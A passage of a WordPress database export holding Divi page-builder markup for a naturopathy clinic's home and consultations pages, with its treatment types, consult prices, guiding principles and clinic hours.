use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2025-04-01 10:52:56','2025-04-01 02:52:56','',28,'https://verdenaturopathy.com.au/?p=420',0,'revision','',0),(141,1,'2021-05-25 20:36:48','2021-05-25 12:36:48','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" title_text=\"1-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column 